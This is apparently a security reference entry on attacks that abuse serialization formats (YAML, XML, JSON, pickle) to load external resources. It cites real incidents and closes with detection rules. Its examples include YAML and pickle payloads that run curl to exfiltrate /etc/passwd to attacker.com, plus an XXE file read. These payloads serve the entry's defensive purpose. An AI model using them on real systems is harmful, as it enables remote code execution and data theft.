Serialized Data External Linking
Serialized Data External Linking is a subtechnique of Request Forgery where attackers exploit serialization mechanisms to force applications into loading or processing data from external sources. This technique is particularly dangerous in modern applications that use serialization formats like YAML, JSON, or XML for configuration and data exchange. When successful, external linking attacks can lead to remote code execution, data exfiltration, or service compromise by tricking applications into processing malicious external resources.
Examples in the Wild
Notable External Linking Attacks:
ShellTorch (CVE-2023-43654) The ShellTorch attack demonstrated sophisticated exploitation of external linking in PyTorch's TorchServe framework. Attackers exploited YAML deserialization to load malicious external resources, achieving remote code execution and data exfiltration:
- Affected major cloud AI platforms (Google Cloud AI, AWS SageMaker, Azure ML)
- Exploited model configuration loading
- Chained with SSRF for enhanced impact
- Led to widespread model and data theft
ShadowRay Attack The ShadowRay attack leveraged external linking in Ray's distributed training infrastructure to: - Load malicious model configurations - Access sensitive training data - Exfiltrate proprietary models - Compromise training pipelines
Spring Framework RCE (CVE-2022-22965) The Spring4Shell vulnerability demonstrated how external linking in data binding could lead to RCE: - Affected Spring Framework 5.3.0 to 5.3.17 - Exploited class loading mechanisms - Allowed arbitrary code execution - Impacted numerous enterprise applications
Attack Mechanism
Common External Linking Techniques:
-
YAML External Entity Loading
# Malicious YAML configuration model_config: !include http://attacker.com/malicious.yml # Or more directly: !!python/object/apply:os.system - 'curl http://attacker.com/exfil?data=$(cat /etc/passwd)'
-
XML External Entity (XXE)
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <config> <setting>&xxe;</setting> </config>
-
JSON Schema Reference
{ "$schema": "http://attacker.com/schema.json", "type": "object", "properties": { "malicious": { "$ref": "http://attacker.com/payload.json" } } }
-
Python Pickle Exploitation
# Malicious pickle payload class Evil: def __reduce__(self): return (os.system, ('curl http://attacker.com/exfil?data=$(cat /etc/passwd)',)) # Serialized and sent to target payload = pickle.dumps(Evil())
Detection Challenges
Why Traditional Security Tools Fail:
-
Format Diversity
# Multiple serialization formats data_formats: - yaml: "complex resolution" - xml: "entity expansion" - json: "schema references" - pickle: "code execution" # How to handle all formats?
-
Resolution Complexity
# Resource resolution external_resources: - http: "remote loading" - file: "local access" - custom: "protocol handlers" # How to track resolution?
-
Context Sensitivity
# Context variations usage_contexts: - config_loading: "startup" - data_processing: "runtime" - api_requests: "dynamic" # When to validate?
Required Application Security Strategy:
# External linking protection
- rule: "Resource Resolution"
condition: |
data.contains_external_reference AND
reference.source_not_trusted AND
reference.protocol_dangerous
severity: critical
# Format validation
- rule: "Format Security"
condition: |
format.allows_code_execution OR
format.enables_file_access OR
format.permits_network_calls
severity: high
# Runtime protection
- rule: "Runtime Control"
condition: |
runtime.loading_external_resource OR
runtime.resolving_reference OR
runtime.executing_loaded_code
severity: critical
Key Detection Requirements:
- Resource Validation
- Source verification
- Protocol restriction
-
Content validation
-
Format Control
- Safe deserialization
- Reference limitation
-
Execution prevention
-
Runtime Monitoring
- Resource loading tracking
- Reference resolution logging
- Execution context validation
References & Resources
Official Sources:
Technical Analysis: